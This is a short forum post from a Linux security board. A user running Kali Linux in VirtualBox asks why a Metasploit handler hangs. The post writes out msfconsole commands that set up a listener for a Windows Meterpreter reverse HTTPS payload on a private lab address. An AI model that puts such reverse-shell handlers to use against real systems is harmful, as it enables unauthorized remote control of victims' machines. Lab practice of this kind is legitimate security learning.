LinuxQuestions.org
Visit Jeremy's Blog.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 04-21-2018, 04:47 AM   #1
venkibellu
LQ Newbie
 
Registered: Jun 2016
Posts: 24

Rep: Reputation: Disabled
Metasploit payload handler not starting


Hi,
I am using kali linux in virtual box
I do following commands
use exploit/multi/handler
set PAYLOAD windows/meterpreter/https_reverse
set LHOST 10.0.2.5
set LPORT 8080
exploit

After this, only I get[*] Started HTTP reverse handler on http://10.0.2.5:8080

I wont get started payload handler and also the process freezez. Please help.
Thanks in advance
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
How to replace the default handler with user defined handler in Linux kernel ? vl chowdary Linux - Kernel 4 04-27-2011 02:09 PM
SIGSEGV handler (segmentation fauld handler) myp Programming 8 03-08-2011 02:17 PM
Difference between FTP payload Data and simply chopping a file into payload size ahm_irf Programming 1 11-07-2007 08:58 AM
<0>Kernel panic: Aiee, killing interrupt handler! In interrupt handler - not syncing mrb Linux - Newbie 2 01-09-2005 09:47 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 06:46 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration